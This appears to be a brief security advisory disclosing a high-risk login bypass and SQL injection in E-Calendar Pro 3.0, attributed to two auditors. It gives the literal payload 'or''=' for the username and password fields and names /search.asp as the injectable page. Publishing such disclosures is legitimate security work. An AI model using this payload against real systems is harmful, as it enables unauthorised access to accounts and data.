vendor site:http://www.futuretec-soft.com/ product:E-Calendar Pro 3.0 bug:login bypass & injection sql post risk:high login bypass : username: 'or''=' passwd: 'or''=' injection sql post: in : /search.asp post your query into the search engine . laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit@xxxxxxxxx